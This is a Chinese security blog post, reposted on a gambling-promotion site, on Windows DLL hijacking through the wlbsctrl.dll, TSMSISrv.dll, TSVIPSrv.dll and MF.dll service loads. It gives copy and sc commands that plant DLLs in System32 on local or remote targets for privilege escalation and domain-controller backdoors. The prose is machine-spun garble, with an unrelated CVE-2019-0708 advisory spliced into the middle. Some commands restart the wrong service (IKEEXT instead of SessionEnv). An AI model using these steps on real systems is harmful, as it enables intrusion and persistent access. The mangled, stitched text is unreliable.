《Lateral Movement — SCM and DLL Hijacking Primer》的应用扩大 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

《Lateral Movement — SCM and DLL Hijacking Primer》的应用扩大

申博_新闻事件 申博 102次浏览 未收录 0个评论

0x00 媒介

《Lateral Movement — SCM and DLL Hijacking Primer》引见了三个dll(wlbsctrl.dll、TSMSISrv.dll和TSVIPSrv.dll)可以或许经由过程SCM(Service Control Manager)完成长途实行。本文将要扩大这三个dll的用法,离别引见提权和后门运用的要领。

0x01 简介

本文将要引见以下内容:

· 运用wlbsctrl.dll完成的提权

· 运用TSMSISrv.dll和TSVIPSrv.dll完成的后门

· 运用MF.dll完成的后门

0x03 wlbsctrl.dll的运用

1、原文中的用法

IKEEXT(IKE and AuthIP IPsec Keying Modules)效劳在启动时会加载wlbsctrl.dll,但Windows体系默许设置装备摆设下该dll不存在,若是我们将本身的dll放在这个地位,在效劳启动时就可以加载该dll

POC:https://github.com/djhohnstein/wlbsctrl_poc

测试体系: Win7 x64

这里运用的dll不须要指定导出函数,以是可以或许直接运用之前我的测试dll:

https://github.com/3gstudent/test/raw/master/calc_x64.dll

当地实行的用法: (须要管理员权限)

copy calc_x64.dll C:\Windows\System32\wlbsctrl.dll
sc query IKEEXT
sc stop IKEEXT
sc start IKEEXT

长途实行的用法:

copy calc_x64.dll \\TARGET\C$\Windows\System32\wlbsctrl.dll
sc \\TARGET query IKEEXT
sc \\TARGET stop IKEEXT
sc \\TARGET start IKEEXT

2、运用wlbsctrl.dll完成的提权

POC:https://github.com/itm4n/Ikeext-Privesc

完成道理:

1. IKEEXT(IKE and AuthIP IPsec Keying Modules)效劳在启动时会加载wlbsctrl.dll,但并未指定绝对途径

注:递次在挪用DLL时,若是未指明DLL的完全途径,那末体系会依照一套流动的搜刮递次寻觅DLL。

若是SafeDllSearchMode开启,递次会顺次从以下地位查找DLL文件:

· The directory from which the application loaded

· The system directory

· The 16-bit system directory

· The Windows directory

· The current directory

· The directories that are listed in the PATH environment variable

若是封闭,则从以下地位查找DLL文件:

· The directory from which the application loaded

· The current directory

· The system directory

· The 16-bit system directory

· The Windows directory

· The directories that are listed in the PATH environment variable

细致内容见:

Windows远程代码执行漏洞(CVE-2019-0708)预警

1、概述         2019年5月14日微软官方发布了对远程桌面服务(Remote Desktop Services)的关键远程代码执行漏洞CVE-2019-0708的安全补丁,受影响的Windows系统版本在启用了远程桌面服务时容易遭受远程代码执行攻击。该漏洞不需要用户交互,即该漏洞可以被利用发起蠕虫类攻击,类似WannaCry(魔窟)勒索蠕虫事件。虽然目前没有发现对该漏洞的利用,但之后攻击者很可能将该漏洞利用加入到恶意代码中,就像MS17-010(永恒之蓝)漏洞一样,微软在2017年3月14日发布MS17-010漏洞补丁,2017年5月17日WannaCry(魔窟)利用永恒之蓝漏洞进行传播。         根据相关数据源统计,目前,全球公共网络中有近300多万计算机开启了3389端口,即未改变端口的远程桌面服务(RDP),对于没有经过配置加固的内网更有大量机器开放相关端口服务。因此,该漏洞既可能造成互联网大面积的蠕虫传播、僵尸网络大面积感染,也能形成内网大面积横向移动攻击能力。 2、漏洞描述         漏洞编号:CVE-2019-0708         该漏洞允许未经身份验证的攻击者使用远程桌面服务连接到目标系统并发送精心设计过的请求,利用其身份预认证、不需要用户交互确认同意接收连接的缺陷,即可在目标系统上执行任意代码,

https://msdn.microsoft.com/en-us/library/ms682586(VS.85).aspx

2. Windows体系默许设置装备摆设下不存在wlbsctrl.dll,若是我们可以或许找到知足前提的PATH情况变量(普通用户权限可写),就可以完成dll挟制,加载我们本身的dll

3. 普通用户权限可以或许启动IKEEXT效劳,要领以下:

天生文件rasphone.pbk:

[IKEEXT]
MEDIA=rastapi
Port=VPN2-0
Device=Wan Miniport (IKEv2)
DEVICE=vpn
PhoneNumber=127.0.0.1

敕令行实行:

rasdial IKEEXT test test /PHONEBOOK:rasphone.pbk

注:这个破绽很陈旧,早在2012年10月9日被公然

https://www.immuniweb.com/advisory/HTB23108

0x04 TSMSISrv.dll和TSVIPSrv.dll的运用

1、原文中的用法

SessionEnv(Remote Desktop Configuration)效劳在启动时会加载C:\Windows\System32\TSMSISrv.dll和C:\Windows\System32\TSVIPSrv.dll,但Windows体系默许设置装备摆设下这两个dll不存在,若是我们将本身的dll放在这个地位,在效劳启动时就可以加载该dll。

POC:https://github.com/djhohnstein/TSMSISrv_poc

测试体系: Win7 x64

POC添加了导出函数StartComponent、StopComponent、OnSessionChange和Refresh。

我的测试情况下dll不须要指定导出函数,以是可以或许直接运用之前我的测试dll:

https://github.com/3gstudent/test/raw/master/calc_x64.dll

当地实行的用法: (须要管理员权限)

copy calc_x64.dll C:\Windows\System32\TSMSISrv.dll
sc query IKEEXT
sc stop IKEEXT
sc start IKEEXT

或许

copy calc_x64.dll C:\Windows\System32\TSVIPSrv.dll
sc query IKEEXT
sc stop IKEEXT
sc start IKEEXT

长途实行的用法:

copy calc_x64.dll \\TARGET\C$\Windows\System32\TSMSISrv.dll
sc \\TARGET query IKEEXT
sc \\TARGET stop IKEEXT
sc \\TARGET start IKEEXT

或许

copy calc_x64.dll \\TARGET\C$\Windows\System32\TSVIPSrv.dll
sc \\TARGET query IKEEXT
sc \\TARGET stop IKEEXT
sc \\TARGET start IKEEXT

2、运用TSMSISrv.dll和TSVIPSrv.dll完成的后门

若是体系开启了长途桌面的功用(支撑长途衔接到此计算机),就会开启SessionEnv(Remote Desktop Configuration)效劳。

若是我们在C:\Windows\System32\下写入TSMSISrv.dll或TSVIPSrv.dll,就可以在效劳启动时加载该dll,完成代码实行。

运用场景:

取得域控制器文件的长途接见权限,但没法长途实行敕令。

处理要领:

1.若是域控制器未开启长途桌面的功用,在体系启动时挟制Explorer.exe对fxsst.dll的加载

写入文件C:\Windows\fxsst.dll

2.若是域控制器开启了长途桌面的功用,在体系启动时将开启SessionEnv效劳,加载TSMSISrv.dll或TSVIPSrv.dll

写入文件C:\Windows\System32\TSMSISrv.dll或C:\Windows\System32\TSMSISrv.dll

3.若是域控制器开启了长途桌面的功用,在用户举行长途桌面衔接时将会加载MF.dll

现实测试:

测试情况: Server2012R2 x64

写入文件C:\Windows\System32\MF.dll,敕令以下:

copy calc_x64.dll C:\Windows\System32\MF.dll

守候用户衔接长途桌面,衔接胜利后加载MF.dll,弹出计算器,以下图:

《Lateral Movement — SCM and DLL Hijacking Primer》的应用扩大

0x05 小结

本文引见了三个运用要领:运用wlbsctrl.dll完成的提权、运用TSMSISrv.dll/TSVIPSrv.dll完成的后门和运用MF.dll完成的后门,个中MF.dll可以或许用来处理取得域控制器文件的长途接见权限,但没法长途实行敕令的题目。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明《Lateral Movement — SCM and DLL Hijacking Primer》的应用扩大
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址